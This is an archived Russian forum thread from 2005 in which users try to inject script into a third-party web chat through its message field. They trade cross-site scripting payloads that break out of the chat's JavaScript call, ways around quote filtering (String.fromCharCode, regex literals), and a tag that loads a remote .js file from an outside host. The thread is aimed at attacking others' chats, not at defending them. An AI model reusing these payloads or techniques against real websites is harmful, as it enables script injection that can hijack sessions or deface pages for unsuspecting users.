Просмотр полной версии : Какие будут предложения
Сообщения вводятся в чат следующим образом :
<script>top.pr('18:52:55','Вася','коля','петя, Саша, прииивааа............',1,0);</script>
Какие будут идеи по поводу того как вставить теги в этот чат
твоя месага должна быть примерно такой-
приветааааа',1,0);alert('XAXA');top.pr( '18:52:55','Вася','коля','петя, Саша, приветааааа
алерт должен сработать без видимых изменений в странице
Антошка2003
02.11.2005, 15:41
а что за чат такой?)))
Так вставить не получается - alert('hacked') преобразовывается в alert(´Hacked´) т.е. ' заменяется =(( Есть у кого-нибудь идеи по этому поводу ?
попробуй с " :
alert("hacked")
можно так ещё:
alert("hacked")
а самый лучший способ, так:
делаешь *.js через блокнот пишешь в нём alert('hacked')
заливаешь куданить, например на народ.ру и в мессаге прописываешь:
прииивааа............',1,0);</script><script/**/src=http://blabla.ru/a.js>
поидее должно прокатить, но вот в последнем случае на странице вместо сообщения будет кака)))))
--------
скинь мне в pm ссылку этого чата....
С " тоже не катит - как есть, так и отображается......
Прикол с *.js тоже не проходит, уже пробовал
censored!
04.11.2005, 14:09
alert(/Hacked/)
alert(/Hacked/) В этом случае он вместе с "/" вилезет, а почему не написать вобще пустой алерт, тоесть если тебе надо только одно слово Хакед допустим, то оно и без всяких знаков пройдет!
чего вы мучаетесь то =) Пуффик прав=) если одно слово то просто alert(hacked) и все=)
ДА ТЫ ЧТО?!!! А ТЫ УВЕРЕН?
†‡•[[a|p]•‡†
04.11.2005, 17:57
<A style="TEXT-DECORATION: none" onclick=" return top.add_nick_to_message('testthisfucking: ')" href=""><FONT color=black size=3><B>testthisfucking: </B></FONT></A><A style="TEXT-DECORATION: none" onclick="return top.add_nick_to_message('MESSAGE ');" href=""><FONT color=#000000 size=3>MESSAGE</FONT>
чтоп не начинать новый тред. я чет вот тут ничего сделать не смог...посматрите.может что либо можно
<tp ковычек может только цифры... alert(666)
<tp ковычек может только цифры... alert(666)Кстати да! Сейчас попробовал и не выходит! НО почемуто иногда же получается(нмеогу вспомнить где, но то что выходило - 100% даю)!Пуффик Ха ха ха! =)) Меня так в чате моего города называют! =))
alert(String.fromCharCode(111,107))
vBulletin® v3.8.14, Copyright ©2000-2026, vBulletin Solutions, Inc. Перевод: zCarot